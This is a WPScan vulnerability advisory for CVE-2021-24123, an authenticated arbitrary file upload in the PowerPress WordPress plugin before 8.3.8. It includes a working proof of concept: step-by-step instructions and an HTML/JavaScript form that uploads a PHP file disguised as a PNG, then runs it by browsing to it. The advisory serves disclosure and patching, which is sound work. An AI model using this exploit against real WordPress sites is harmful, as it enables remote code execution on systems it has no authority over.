WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

PowerPress < 8.3.8 - Authenticated Arbitrary File Upload leading to RCE

Description

The plugin did not verify some of the uploaded feed images (such as the ones from Podcast Artwork section), allowing high privilege accounts (admin+) being able to upload arbitrary files, such as php, leading to RCE.

Proof of Concept

https://drive.google.com/file/d/1fyf6blzeG3VX22BQX7hc1QJ20rCY5p43/view?usp=sharing

- Save the below HTML code in an HTML file
- Replace the <BLOG> to the correct one
- Logon to the blog as admin, go to the Blubrry PowerPress Settings > Feeds and get the nonce from the source of the page (Look for "_wpnonce) and replace <NONCE> by it's value in the saved code
- Open the saved HTML file with the same browser used to login to the blog, and click on 'Submit request'
- Then open <BLOG>/wp-content/uploads/powerpress/up.php in the browser
 
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/<BLOG>\/wp-admin\/admin.php?page=powerpressadmin_basic", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundary5Ac7Ayyi2qVtiLqA");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + 
          "\r\n" + 
          "<NONCE>\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "powerpress-save-settings\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"Feed[rss2_image]\"\r\n" + 
          "\r\n" + 
          "aa.png\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"rss2_image_checkbox\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"rss2_image_file\"; filename=\"up.php\"\r\n" + 
          "Content-Type: image/png\r\n" + 
          "\r\n" + 
          "\x89PNG\r\n" + 
          "\x1a\n" + 
          "\x3c?php phpinfo(); ?\x3e\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Affects Plugins

powerpress
Fixed in version 8.3.8

References

CVE
CVE-2021-24123
URL
https://plugins.trac.wordpress.org/changeset/2396808

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Minh Tuan - SunCSR (Sun* Cyber Security Research)

Submitter

minhtuanact

Submitter website
https://research.sun-asterisk.com/
Submitter twitter
tuanbgpro97
Verified

Yes

WPVDB ID
43aa30bf-eaf8-467a-93a1-78f9bdb37b36

Timeline

Publicly Published

2020-10-11 (about 2 years ago)

Added

2020-10-11 (about 2 years ago)

Last Updated

2021-01-21 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin